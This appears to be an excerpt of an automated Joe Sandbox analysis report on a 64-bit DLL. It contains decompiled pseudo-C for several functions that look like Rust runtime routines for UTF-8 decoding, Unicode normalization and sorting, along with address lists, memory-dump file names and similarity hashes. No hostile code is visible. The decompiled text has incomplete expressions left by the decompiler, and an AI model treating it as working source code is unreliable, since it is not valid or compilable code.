				if ((_t176 & 0xffffff00 | _t318 > 0x00000000) != 0) goto 0xf30a2658;
				if (_t370 == 0) goto 0xf30a262d;
				 *_t344 =  &(_t381[1]);
				_t344[1] = _t370 - 1;
				if (_t336 - 0x30 - 0xa >= 0) goto 0xf30a2631;
				goto 0xf30a2653;
				 *_t344 = _t342;
				goto 0xf30a264f;
				goto 0xf30a264c;
				_t224 =  >=  ? 0xffffffc9 : 0xffffffff;
				_t323 = ( >=  ? 0xffffffc9 : 0xffffffff) - r9d;
				if (_t323 < 0) goto 0xf30a2653;
				 *_t344 = _t381;
				_t344[1] = _t370;
				if ((0 | _t323 > 0x00000000) != 1) goto 0xf30a2673;
				 *_t344 = _t386;
				_t344[1] = _t384;
				return 0;
			}

0x7fef30a200e
0x7fef30a2014
0x7fef30a201b
0x7fef30a2024
0x7fef30a2026
0x7fef30a2029
0x7fef30a202c
0x7fef30a202f
0x7fef30a203a
0x7fef30a203f
0x7fef30a2048
0x7fef30a2058
0x7fef30a205d
0x7fef30a206d
0x7fef30a2072
0x7fef30a2077
0x7fef30a2080
0x7fef30a208a
0x7fef30a2090
0x7fef30a2095
0x7fef30a209b
0x7fef30a20a1
0x7fef30a20a6
0x7fef30a20b4
0x7fef30a20b8
0x7fef30a20bb
0x7fef30a20bf
0x7fef30a20c5
0x7fef30a20cb
0x7fef30a20d4
0x7fef30a20da
0x7fef30a20e3
0x7fef30a20ec
0x7fef30a20fe
0x7fef30a2101
0x7fef30a2105
0x7fef30a210d
0x7fef30a2118
0x7fef30a211d
0x7fef30a2120
0x7fef30a2123
0x7fef30a2126
0x7fef30a2138
0x7fef30a2145
0x7fef30a2148
0x7fef30a214c
0x7fef30a2151
0x7fef30a2157
0x7fef30a2159
0x7fef30a215c
0x7fef30a2166
0x7fef30a2169
0x7fef30a2172
0x7fef30a2176
0x7fef30a217c
0x7fef30a217f
0x7fef30a218c
0x7fef30a2194
0x7fef30a21a0
0x7fef30a21a3
0x7fef30a21a5
0x7fef30a21a8
0x7fef30a21ae
0x7fef30a21b1
0x7fef30a21b4
0x7fef30a21b7
0x7fef30a21c8
0x7fef30a21d5
0x7fef30a21d8
0x7fef30a21dc
0x7fef30a21dc
0x7fef30a21e2
0x7fef30a21eb
0x7fef30a21f9
0x7fef30a21ff
0x7fef30a2202
0x7fef30a2206
0x7fef30a2208
0x7fef30a220b
0x7fef30a2218
0x7fef30a221d
0x7fef30a2221
0x7fef30a2227
0x7fef30a222a
0x7fef30a2237
0x7fef30a223f
0x7fef30a224e
0x7fef30a2256
0x7fef30a225c
0x7fef30a2263
0x7fef30a2266
0x7fef30a226a
0x7fef30a226d
0x7fef30a2273
0x7fef30a2280
0x7fef30a2289
0x7fef30a229a
0x7fef30a229d
0x7fef30a22ac
0x7fef30a22ae
0x7fef30a22b5
0x7fef30a22c0
0x7fef30a22c6
0x7fef30a22cc
0x7fef30a22cf
0x7fef30a22d3
0x7fef30a22d5
0x7fef30a22d8
0x7fef30a22dc
0x7fef30a22df
0x7fef30a22e5
0x7fef30a22f2
0x7fef30a22fb
0x7fef30a230c
0x7fef30a230f
0x7fef30a2319
0x7fef30a2324
0x7fef30a232b
0x7fef30a232e
0x7fef30a2332
0x7fef30a2335
0x7fef30a233b
0x7fef30a2341
0x7fef30a2344
0x7fef30a2348
0x7fef30a234e
0x7fef30a2351
0x7fef30a235e
0x7fef30a2366
0x7fef30a236f
0x7fef30a2379
0x7fef30a2381
0x7fef30a2384
0x7fef30a2393
0x7fef30a2399
0x7fef30a23a0
0x7fef30a23b0
0x7fef30a23b5
0x7fef30a23b8
0x7fef30a23bc
0x7fef30a23be
0x7fef30a23c1
0x7fef30a23c5
0x7fef30a23ce
0x7fef30a23d7
0x7fef30a23db
0x7fef30a23e1
0x7fef30a23e4
0x7fef30a23f1
0x7fef30a23f9
0x7fef30a2402
0x7fef30a2414
0x7fef30a2417
0x7fef30a241b
0x7fef30a2421
0x7fef30a242c
0x7fef30a2433
0x7fef30a2436
0x7fef30a243a
0x7fef30a243d
0x7fef30a2443
0x7fef30a244c
0x7fef30a2450
0x7fef30a2456
0x7fef30a2459
0x7fef30a2466
0x7fef30a246e
0x7fef30a2477
0x7fef30a2481
0x7fef30a2489
0x7fef30a248c
0x7fef30a249b
0x7fef30a24a1
0x7fef30a24a8
0x7fef30a24b8
0x7fef30a24bd
0x7fef30a24c3
0x7fef30a24c5
0x7fef30a24c8
0x7fef30a24cc
0x7fef30a24cf
0x7fef30a24d2
0x7fef30a24d5
0x7fef30a24de
0x7fef30a24e2
0x7fef30a24e8
0x7fef30a24eb
0x7fef30a24f8
0x7fef30a2500
0x7fef30a2509
0x7fef30a250f
0x7fef30a251a
0x7fef30a251d
0x7fef30a2521
0x7fef30a2527
0x7fef30a2532
0x7fef30a2539
0x7fef30a253c
0x7fef30a2540
0x7fef30a2543
0x7fef30a2549
0x7fef30a2552
0x7fef30a2556
0x7fef30a255c
0x7fef30a255f
0x7fef30a256c
0x7fef30a2574
0x7fef30a257d
0x7fef30a2583
0x7fef30a258e
0x7fef30a2591
0x7fef30a25a0
0x7fef30a25a6
0x7fef30a25ad
0x7fef30a25bd
0x7fef30a25c2
0x7fef30a25c8
0x7fef30a25ca
0x7fef30a25cd
0x7fef30a25d1
0x7fef30a25d4
0x7fef30a25d7
0x7fef30a25da
0x7fef30a25e3
0x7fef30a25e7
0x7fef30a25e9
0x7fef30a25ec
0x7fef30a25f9
0x7fef30a25fd
0x7fef30a2602
0x7fef30a2610
0x7fef30a2613
0x7fef30a261d
0x7fef30a2624
0x7fef30a2628
0x7fef30a262b
0x7fef30a262f
0x7fef30a263f
0x7fef30a2644
0x7fef30a264a
0x7fef30a264c
0x7fef30a264f
0x7fef30a2656
0x7fef30a2658
0x7fef30a265b
0x7fef30a2672

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30A2051

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 0-1586615424
Opcode ID: 3d35438137fbfa623740070fd0ae4abce693cd624f70ef0c232775d534948c87
Instruction ID: c46eb23ead53026b354ed8f95ace20c20f99fd728107a6dd9a8f40d13802f762
Opcode Fuzzy Hash: 3d35438137fbfa623740070fd0ae4abce693cd624f70ef0c232775d534948c87
Instruction Fuzzy Hash: D0F1B732E0AB5749EEA04A24F94037C72DEB715B94F688132CA5C57BE4E67E9497F300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305A7AA Relevance: 1.7, APIs: 1, Instructions: 447
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E000007FE7FEF305A7AA(signed long long __rcx) {
				void* _t147;
				intOrPtr _t163;
				signed char _t173;
				char _t176;
				void* _t192;
				signed int _t207;
				intOrPtr _t213;
				signed int _t216;
				signed int _t229;
				intOrPtr _t231;
				void* _t262;
				intOrPtr _t272;
				intOrPtr _t308;
				signed long long _t311;
				unsigned long long _t313;
				intOrPtr _t315;
				signed long long _t317;
				signed long long _t318;
				signed long long _t324;
				intOrPtr _t329;
				long long _t339;
				intOrPtr* _t341;
				signed long long _t342;
				intOrPtr _t343;
				long long* _t344;
				signed long long _t351;
				signed long long _t352;
				signed short* _t358;
				intOrPtr _t361;
				intOrPtr* _t363;
				signed long long _t364;
				void* _t379;
				signed long long _t380;
				unsigned long long _t382;
				long long _t385;
				long long _t387;
				intOrPtr _t388;
				signed short* _t389;
				void* _t390;
				void* _t395;
				void* _t396;
				signed long long _t397;
				intOrPtr* _t399;
				signed long long* _t400;

				_t342 = __rcx;
				asm("movaps [esp+0x60], xmm6");
				_t397 = __rcx;
				_t1 = _t342 + 0x60; // 0x67
				 *((long long*)(_t390 + 0x30)) = _t1;
				_t3 = _t342 + 0x68; // 0x6f
				 *((long long*)(_t390 + 0x28)) = _t3;
				_t5 = _t342 + 0x64; // 0x6b
				 *(_t390 + 0x38) = _t5;
				_t7 = _t342 + 0x18; // 0x1f
				_t399 = _t7;
				_t8 = _t342 + 0x38; // 0x3f
				_t400 = _t8;
				_t308 =  *((intOrPtr*)(__rcx + 0x50));
				asm("xorps xmm6, xmm6");
				if (_t308 == 0) goto 0xf305a82c;
				if (_t308 != 1) goto 0xf305ad9d;
				if ( *((intOrPtr*)(__rcx + 0x60)) == 0) goto 0xf305acda;
				if ( *((intOrPtr*)(__rcx + 0x58)) -  *((intOrPtr*)(__rcx + 0x78)) < 0) goto 0xf305adb8;
				 *((long long*)(__rcx + 0x78)) = 0;
				goto 0xf305ad04;
				if ( *((intOrPtr*)(__rcx + 0x40)) != 0) goto 0xf305a8ee;
				_t343 =  *((intOrPtr*)(__rcx));
				_t344 =  !=  ? __rcx : _t343;
				if (_t343 == 0) goto 0xf305a8b9;
				_t363 =  *_t344;
				if (_t363 ==  *((intOrPtr*)(_t344 + 8))) goto 0xf305a8b9;
				 *_t344 = _t363 + 1;
				_t173 =  *_t363;
				if (bpl >= 0) goto 0xf305a908;
				 *_t344 = _t363 + 2;
				if (bpl - 0xdf <= 0) goto 0xf305a8f8;
				 *_t344 = _t363 + 3;
				_t216 = ( *(_t363 + 1) & 0x3f) << 6;
				if (_t173 - 0xf0 < 0) goto 0xf305a901;
				_t387 = _t363 + 4;
				 *_t344 = _t387;
				_t207 = ( *(_t363 + 2) & 0x3f | _t216) << 6;
				if (( *(_t363 + 3) & 0x3f | _t207 | (_t173 & 7) << 0x00000012) != 0x110000) goto 0xf305a908;
				_t364 =  *((intOrPtr*)(__rcx + 0x28));
				_t334 =  ==  ? _t344 : _t364;
				_t252 =  ==  ? _t344 : _t364;
				if (( ==  ? _t344 : _t364) == 0) goto 0xf305ad14;
				if ( *((intOrPtr*)(__rcx + 0x10)) == 0) goto 0xf305aa3f;
				_t311 =  *_t399;
				goto 0xf305aa4f;
				goto 0xf305aa72;
				goto 0xf305a908;
				_t229 = _t207 | (( *(__rcx + 0x14) & 0x0000ffff) << 0x00000006 | _t216) << 0x0000000c;
				if ( *((char*)(__rcx + 0x48)) == 0) goto 0xf305a974;
				if (_t229 - 0x80 < 0) goto 0xf305a9f6;
				if (_t387 - 0xac00 - 0x2ba4 < 0) goto 0xf305a98a;
				E000007FE7FEF30A62EB(_t229, _t192, _t311, _t344);
				if (_t311 != 0) goto 0xf305a946;
				E000007FE7FEF30A63A0(_t229, _t192, _t311, _t344);
				if (_t311 == 0) goto 0xf305a9f6;
				if (_t364 == 0) goto 0xf305a82c;
				E000007FE7FEF305AE97( *((intOrPtr*)(_t311 + _t379)), _t311, __rcx);
				_t380 = _t379 + 4;
				if (_t364 << 2 != _t380) goto 0xf305a95b;
				goto 0xf305a82c;
				if (_t229 - 0x80 < 0) goto 0xf305a9f6;
				_t210 = _t387 - 0xac00;
				_t262 = _t387 - 0xac00 - 0x2ba4;
				if (_t262 >= 0) goto 0xf305aa05;
				_t382 = _t380 * _t311 >> 0x29;
				E000007FE7FEF305AE97(_t382 + 0x1100, _t311, _t397);
				_t347 = _t397;
				E000007FE7FEF305AE97((((_t387 - 0x0000ac00 - _t210 * 0x0000024c & 0x0000ffff) >> 2) * 0x4925 >> 0x11) + 0x1161, _t311, _t397);
				_t313 = _t311 * 0x24924925 >> 0x20;
				if (_t262 == 0) goto 0xf305a82c;
				E000007FE7FEF305AE97(_t210 - _t397 + _t347 * 2 + (_t210 >> 2) + 0x11a7, _t313, _t397);
				goto 0xf305a82c;
				E000007FE7FEF30A63A0(_t210 - _t397 + _t347 * 2 + (_t210 >> 2) + 0x11a7, _t210 - _t397 + _t347 * 2 + (_t210 >> 2) + 0x11a7, _t313, _t397);
				if (_t313 == 0) goto 0xf305a9f6;
				if (_t364 == 0) goto 0xf305a82c;
				_t147 = E000007FE7FEF305AE97( *((intOrPtr*)(_t313 + _t382)), _t313, _t397);
				if (_t364 << 2 != _t382 + 4) goto 0xf305aa26;
				goto 0xf305a82c;
				if (_t147 - 5 >= 0) goto 0xf305ae80;
				E000007FE7FEF305B0D6();
				_t231 =  *((intOrPtr*)(_t397 + 0x10));
				if (_t231 == 0) goto 0xf305aa67;
				_t339 =  *((intOrPtr*)(_t397 + 0x28));
				goto 0xf305aa6d;
				 *((long long*)(_t397 + 0x40)) = _t339;
				_t351 =  *_t400;
				if (_t231 == 0) goto 0xf305aa85;
				_t315 =  *((intOrPtr*)(_t397 + 0x28));
				goto 0xf305aa98;
				if (_t315 - 5 >= 0) goto 0xf305ae6f;
				if (_t315 - _t351 <= 0) goto 0xf305adc2;
				_t213 =  *((intOrPtr*)(_t399 + 4 + _t351 * 8));
				_t352 = _t351 + 1;
				if (_t352 != _t339) goto 0xf305aab8;
				_t272 = _t231;
				if (_t272 == 0) goto 0xf305aac0;
				goto 0xf305aac6;
				 *_t400 = _t352;
				goto 0xf305ab5b;
				_t385 =  *((intOrPtr*)(_t397 + 0x28)) - _t339;
				if (_t272 == 0) goto 0xf305ab34;
				_t317 =  *((intOrPtr*)(_t397 + 0x40)) + _t352;
				if ( *((intOrPtr*)(_t397 + 0x10)) == 0) goto 0xf305aaf0;
				_t388 =  *((intOrPtr*)(_t397 + 0x28));
				if (_t388 - _t317 <= 0) goto 0xf305ad73;
				goto 0xf305ab0c;
				if (_t388 - 5 >= 0) goto 0xf305ae59;
				_t341 = _t399;
				if (_t317 - _t388 >= 0) goto 0xf305ad73;
				if (_t388 - _t352 <= 0) goto 0xf305ad7f;
				 *((char*)(_t341 + _t352 * 8)) =  *((intOrPtr*)(_t341 + _t317 * 8));
				 *((intOrPtr*)(_t341 + 4 + _t352 * 8)) =  *((intOrPtr*)(_t341 + 4 + _t317 * 8));
				_t63 = _t352 + 1; // 0x1
				_t318 = _t63;
				if (_t385 != _t318) goto 0xf305aacd;
				if ( *((intOrPtr*)(_t397 + 0x10)) == 0) goto 0xf305ab46;
				if ( *((intOrPtr*)(_t397 + 0x28)) - _t385 < 0) goto 0xf305ab57;
				 *((long long*)(_t397 + 0x28)) = _t385;
				goto 0xf305ab57;
				if (_t385 - _t318 >= 0) goto 0xf305ab57;
				 *(_t397 + 0x14) =  *(_t397 + 0x14) & 0x0000ffff;
				asm("inc ecx");
				_t176 =  !=  ? 0 :  *((intOrPtr*)(((_t318 * 0x39a >> 0x1f) * 0x39a >> 0x1e) + 0xf312c08c));
				if ( *((intOrPtr*)(_t397 + 0x80)) != 0x110000) goto 0xf305abd2;
				if (_t176 != 0) goto 0xf305ad44;
				 *((intOrPtr*)(_t397 + 0x80)) = _t213;
				goto 0xf305a82c;
				if ( *((char*)(_t397 + 0x84)) == 0) goto 0xf305abf9;
				if ( *((intOrPtr*)(_t397 + 0x85)) - _t176 >= 0) goto 0xf305ac1f;
				if (E000007FE7FEF30A644F( *((intOrPtr*)(_t397 + 0x80)), _t213, _t318, 0xf312b958) == 0x110000) goto 0xf305ac27;
				goto 0xf305ac12;
				_t163 = E000007FE7FEF30A644F( *((intOrPtr*)(_t397 + 0x80)), _t213, _t318, 0xf312b958);
				if (_t163 != 0x110000) goto 0xf305ac12;
				if (_t176 != 0) goto 0xf305ac27;
				goto 0xf305ad90;
				 *((intOrPtr*)(_t397 + 0x80)) = _t163;
				goto 0xf305a82c;
				if (_t176 == 0) goto 0xf305ad4b;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t390 + 0x30)))) == 0) goto 0xf305ac5b;
				if ( *(_t397 + 0x78) !=  *((intOrPtr*)(_t397 + 0x70))) goto 0xf305ac4c;
				E000007FE7FEF305B751( *(_t397 + 0x78) -  *((intOrPtr*)(_t397 + 0x70)),  *((intOrPtr*)(_t390 + 0x28)),  *(_t397 + 0x78));
				_t324 =  *((intOrPtr*)(_t397 + 0x68));
				 *((intOrPtr*)(_t324 +  *(_t397 + 0x78) * 4)) = _t213;
				 *(_t397 + 0x78) =  *(_t397 + 0x78) + 1;
				goto 0xf305ac76;
				if (_t324 - 3 > 0) goto 0xf305ac8c;
				 *((intOrPtr*)( *((intOrPtr*)(_t390 + 0x28)) + _t324 * 4)) = _t213;
				 *( *(_t390 + 0x38)) = ( *( *(_t390 + 0x38)) & 0x0000ffff) + 1;
				 *((char*)(_t397 + 0x84)) = 1;
				 *((char*)(_t397 + 0x85)) = _t176;
				goto 0xf305a82c;
				r8d = _t213;
				E000007FE7FEF30FE568(_t324, _t390 + 0x40,  *(_t390 + 0x38));
				if ( *((intOrPtr*)( *((intOrPtr*)(_t390 + 0x30)))) == 0) goto 0xf305acc2;
				if ( *((long long*)(_t397 + 0x70)) == 0) goto 0xf305acc2;
				HeapFree(??, ??, ??);
				asm("movups xmm0, [esp+0x40]");
				asm("movups xmm1, [esp+0x50]");
				asm("movups [eax+0x10], xmm1");
				asm("movups [eax], xmm0");
				goto 0xf305ac76;
				_t358 =  *(_t390 + 0x38);
				if (_t358 - 5 >= 0) goto 0xf305ae8e;
				if ( *((intOrPtr*)(_t390 + 0x30)) - _t358 < 0) goto 0xf305adfc;
				if (( *_t358 & 0x0000ffff) == 0) goto 0xf305ad04;
				 *( *(_t390 + 0x38)) = 0;
				 *((long long*)(_t397 + 0x50)) = 0;
				goto 0xf305a7f3;
				 *((long long*)(_t397 + 0x50)) = 2;
				 *((long long*)(_t397 + 0x58)) = 0;
				if ( *((intOrPtr*)(_t397 + 0x80)) == 0x110000) goto 0xf305a7f3;
				goto 0xf305ae35;
				goto 0xf305ae41;
				 *((intOrPtr*)(_t397 + 0x80)) = _t213;
				 *((char*)(_t397 + 0x84)) = 0;
				 *((long long*)(_t397 + 0x50)) = 1;
				 *((long long*)(_t397 + 0x58)) = 0;
				goto 0xf305ae41;
				goto 0xf305ad86;
				E000007FE7FEF30FE1A0(_t176,  *_t358 & 0x0000ffff, 0, _t213,  *((intOrPtr*)(_t397 + 0x80)) - 0x110000,  *(_t390 + 0x38), _t388, 0xf310fc70, _t395, _t396);
				asm("ud2");
				 *((intOrPtr*)(_t397 + 0x80)) = _t213;
				goto 0xf305ae41;
				_t329 =  *((intOrPtr*)(_t397 + 0x58));
				if ( *((intOrPtr*)(_t397 + 0x60)) == 0) goto 0xf305adce;
				if (_t329 -  *(_t397 + 0x78) >= 0) goto 0xf305ae17;
				goto 0xf305adeb;
				_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t390 + 0x28))));
				goto 0xf305ae01;
				goto 0xf305ad89;
				_t389 =  *(_t390 + 0x38);
				if (_t361 - 5 >= 0) goto 0xf305ae8e;
				if (_t329 - _t361 >= 0) goto 0xf305ae22;
				 *((long long*)(_t397 + 0x50)) = 2;
				goto 0xf305ae10;
				 *((long long*)(_t397 + 0x50)) = 1;
				 *((long long*)(_t397 + 0x58)) = _t329 + 2;
				goto 0xf305ae41;
				 *(_t397 + 0x78) = 0;
				goto 0xf305ae2d;
				if (( *_t389 & 0x0000ffff) == 0) goto 0xf305ae2d;
				 *_t389 = 0;
				 *((intOrPtr*)(_t397 + 0x80)) = 0x110000;
				asm("movaps xmm6, [esp+0x60]");
				return  *((intOrPtr*)(_t397 + 0x80));
			}

0x7fef305a7aa
0x7fef305a7ba
0x7fef305a7bf
0x7fef305a7c2
0x7fef305a7c6
0x7fef305a7cb
0x7fef305a7cf
0x7fef305a7d4
0x7fef305a7d8
0x7fef305a7dd
0x7fef305a7dd
0x7fef305a7e1
0x7fef305a7e1
0x7fef305a7e5
0x7fef305a7e9
0x7fef305a7f6
0x7fef305a7fc
0x7fef305a80d
0x7fef305a818
0x7fef305a81e
0x7fef305a827
0x7fef305a834
0x7fef305a83a
0x7fef305a841
0x7fef305a845
0x7fef305a847
0x7fef305a84e
0x7fef305a854
0x7fef305a857
0x7fef305a85f
0x7fef305a86e
0x7fef305a87c
0x7fef305a882
0x7fef305a889
0x7fef305a894
0x7fef305a896
0x7fef305a89a
0x7fef305a8a7
0x7fef305a8b7
0x7fef305a8c0
0x7fef305a8d1
0x7fef305a8d5
0x7fef305a8d8
0x7fef305a8e0
0x7fef305a8e6
0x7fef305a8e9
0x7fef305a8f3
0x7fef305a8ff
0x7fef305a906
0x7fef305a90e
0x7fef305a916
0x7fef305a928
0x7fef305a92c
0x7fef305a934
0x7fef305a938
0x7fef305a940
0x7fef305a94f
0x7fef305a961
0x7fef305a966
0x7fef305a96d
0x7fef305a96f
0x7fef305a97a
0x7fef305a97c
0x7fef305a982
0x7fef305a988
0x7fef305a995
0x7fef305a9a2
0x7fef305a9c6
0x7fef305a9c9
0x7fef305a9da
0x7fef305a9e8
0x7fef305a9fb
0x7fef305aa00
0x7fef305aa07
0x7fef305aa0f
0x7fef305aa17
0x7fef305aa2c
0x7fef305aa38
0x7fef305aa3a
0x7fef305aa43
0x7fef305aa52
0x7fef305aa57
0x7fef305aa5e
0x7fef305aa60
0x7fef305aa65
0x7fef305aa6d
0x7fef305aa72
0x7fef305aa77
0x7fef305aa7e
0x7fef305aa83
0x7fef305aa8f
0x7fef305aa9b
0x7fef305aaa1
0x7fef305aaa5
0x7fef305aaab
0x7fef305aaad
0x7fef305aaaf
0x7fef305aab6
0x7fef305aab8
0x7fef305aabb
0x7fef305aac6
0x7fef305aac9
0x7fef305aad2
0x7fef305aadb
0x7fef305aadd
0x7fef305aae5
0x7fef305aaee
0x7fef305aafa
0x7fef305ab00
0x7fef305ab06
0x7fef305ab0f
0x7fef305ab1c
0x7fef305ab1f
0x7fef305ab23
0x7fef305ab23
0x7fef305ab2d
0x7fef305ab36
0x7fef305ab3d
0x7fef305ab3f
0x7fef305ab44
0x7fef305ab4f
0x7fef305ab51
0x7fef305ab57
0x7fef305abaa
0x7fef305abbb
0x7fef305abbf
0x7fef305abc5
0x7fef305abcd
0x7fef305abdb
0x7fef305abe5
0x7fef305abf5
0x7fef305abf7
0x7fef305abfd
0x7fef305ac07
0x7fef305ac0b
0x7fef305ac0d
0x7fef305ac12
0x7fef305ac1a
0x7fef305ac21
0x7fef305ac2f
0x7fef305ac3b
0x7fef305ac42
0x7fef305ac4c
0x7fef305ac51
0x7fef305ac54
0x7fef305ac59
0x7fef305ac67
0x7fef305ac6e
0x7fef305ac73
0x7fef305ac76
0x7fef305ac7f
0x7fef305ac87
0x7fef305ac91
0x7fef305ac94
0x7fef305aca1
0x7fef305aca9
0x7fef305acbc
0x7fef305acc2
0x7fef305acc7
0x7fef305acd1
0x7fef305acd5
0x7fef305acd8
0x7fef305acda
0x7fef305ace6
0x7fef305acef
0x7fef305acf8
0x7fef305acff
0x7fef305ad04
0x7fef305ad0f
0x7fef305ad14
0x7fef305ad1d
0x7fef305ad39
0x7fef305ad3f
0x7fef305ad46
0x7fef305ad4b
0x7fef305ad53
0x7fef305ad5c
0x7fef305ad65
0x7fef305ad6e
0x7fef305ad7d
0x7fef305ad89
0x7fef305ad8e
0x7fef305ad90
0x7fef305ad98
0x7fef305ad9d
0x7fef305ada8
0x7fef305adaf
0x7fef305adb6
0x7fef305adbd
0x7fef305adc0
0x7fef305adcc
0x7fef305adce
0x7fef305addb
0x7fef305ade9
0x7fef305adf1
0x7fef305adfa
0x7fef305ae07
0x7fef305ae10
0x7fef305ae15
0x7fef305ae17
0x7fef305ae20
0x7fef305ae25
0x7fef305ae27
0x7fef305ae35
0x7fef305ae43
0x7fef305ae58

APIs

HeapFree.KERNEL32 ref: 000007FEF305ACBC

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d432a2130a719f7e026303c8d31c41a65259b57586670d8d3f294fb4bee96dc3
Instruction ID: 7970230559506a9a7e40841f4a4bfb3c82121360eebc467f0260afa599615df2
Opcode Fuzzy Hash: d432a2130a719f7e026303c8d31c41a65259b57586670d8d3f294fb4bee96dc3
Instruction Fuzzy Hash: E312A272E096868EEBD69B15D44877A77E6FB44780F454233DA4E473A1EB7CE881E300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305B0D6 Relevance: 1.7, APIs: 1, Instructions: 438
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E000007FE7FEF305B0D6() {
				void* _t150;
				void* _t151;
				intOrPtr _t153;
				intOrPtr _t163;
				void* _t185;
				void* _t190;
				void* _t195;
				void* _t209;
				void* _t221;
				long long _t227;
				signed long long _t232;
				long long _t239;
				intOrPtr _t240;
				signed long long _t249;
				void* _t252;
				intOrPtr* _t254;
				void* _t256;
				long long _t258;
				signed long long _t260;
				long long _t267;
				signed long long _t272;
				signed long long _t274;
				signed long long _t277;
				signed long long _t282;
				intOrPtr _t285;
				signed long long _t289;
				void* _t292;
				signed long long _t294;
				signed long long _t297;
				signed long long _t303;
				signed long long _t304;
				signed long long _t313;
				signed long long _t315;
				signed long long _t316;
				signed long long _t317;
				void* _t319;
				signed long long _t331;
				signed long long _t332;
				void* _t333;
				void* _t334;
				signed long long _t338;
				signed long long _t340;
				signed long long _t341;
				signed long long _t342;
				signed long long _t343;
				void* _t349;
				unsigned long long _t353;
				signed long long _t358;
				signed long long _t360;
				signed long long _t361;
				signed long long _t362;
				void* _t368;
				intOrPtr _t372;
				signed long long _t374;
				signed long long _t375;
				void* _t377;
				void* _t378;
				void* _t380;
				signed long long _t381;
				void* _t383;
				void* _t397;
				signed long long _t400;
				signed long long _t404;
				long long _t406;
				void* _t407;
				signed long long _t413;
				intOrPtr _t418;
				signed long long _t419;
				signed long long _t426;
				signed long long _t427;
				signed long long _t429;
				signed long long _t430;
				void* _t431;
				long long* _t433;

				_t378 = _t377 - 0xb8;
				_t430 = _t303;
				_t406 = _t267;
				if (_t303 - 0x15 >= 0) goto 0xf305b138;
				if (_t430 - 2 < 0) goto 0xf305b6d3;
				_t349 = _t406 + _t430 * 8 + 0xfffffff0;
				_t304 = _t331;
				_t151 = E000007FE7FEF305B7F6(_t150, _t349, _t304, _t380, _t397);
				_t227 = _t252 - _t430 + _t331 + 1;
				_t332 = _t331 + 1;
				_t185 = _t227 - 2;
				if (_t185 != 0) goto 0xf305b114;
				goto 0xf305b6d3;
				E000007FE7FEF305B78A(_t151, _t430 >> 1);
				 *((long long*)(_t378 + 0x40)) = _t227;
				 *(_t378 + 0x70) = _t304;
				 *((long long*)(_t378 + 0x48)) = 8;
				asm("xorps xmm0, xmm0");
				asm("movups [eax+0x8], xmm0");
				_t7 = _t406 + 4; // 0x23
				 *((long long*)(_t378 + 0x80)) = _t7;
				_t9 = _t406 - 4; // 0x1b
				 *((long long*)(_t378 + 0x78)) = _t9;
				_t11 = _t406 - 8; // 0x17
				 *((long long*)(_t378 + 0x60)) = _t11;
				r13d = 8;
				r8d = 0;
				_t232 = _t430;
				 *(_t378 + 0x88) = _t430;
				 *((long long*)(_t378 + 0x68)) = _t406;
				_t272 = _t232 - 1;
				if (_t185 == 0) goto 0xf305b1cf;
				_t427 = _t232;
				_t163 =  *((intOrPtr*)(_t406 + _t232 * 8 - 0x10));
				if ( *((intOrPtr*)(_t406 + _t232 * 8 - 8)) - _t163 >= 0) goto 0xf305b1de;
				_t413 = _t304;
				if (_t272 == 1) goto 0xf305b20c;
				_t153 =  *((intOrPtr*)(_t406 + _t272 * 8 - 0x10));
				if (_t163 - _t153 < 0) goto 0xf305b1b9;
				goto 0xf305b20e;
				goto 0xf305b30d;
				_t274 = _t427 - 3;
				if (_t274 == 0xffffffff) goto 0xf305b2f2;
				_t190 = _t153 -  *((intOrPtr*)(_t406 + _t274 * 8));
				if (_t190 >= 0) goto 0xf305b1e7;
				_t277 = _t427 - _t349 + 0xfffffffffffffff9;
				goto 0xf305b27d;
				_t353 = _t427 - _t277;
				if (_t190 < 0) goto 0xf305b73f;
				if (_t427 - _t430 > 0) goto 0xf305b748;
				if (_t353 - 2 < 0) goto 0xf305b27a;
				 *(_t378 + 0x28) = _t413;
				_t368 =  *((intOrPtr*)(_t378 + 0x80)) + _t277 * 8;
				_t254 =  *((intOrPtr*)(_t378 + 0x78)) + _t427 * 8;
				r10b =  *((intOrPtr*)(_t368 + _t332 * 8 - 4));
				r11d =  *((intOrPtr*)(_t368 + _t332 * 8));
				 *((char*)(_t368 + _t332 * 8 - 4)) =  *((intOrPtr*)(_t254 - 4));
				 *((intOrPtr*)(_t368 + _t332 * 8)) =  *_t254;
				 *((intOrPtr*)(_t254 - 4)) = r10b;
				 *_t254 = r11d;
				_t333 = _t332 + 1;
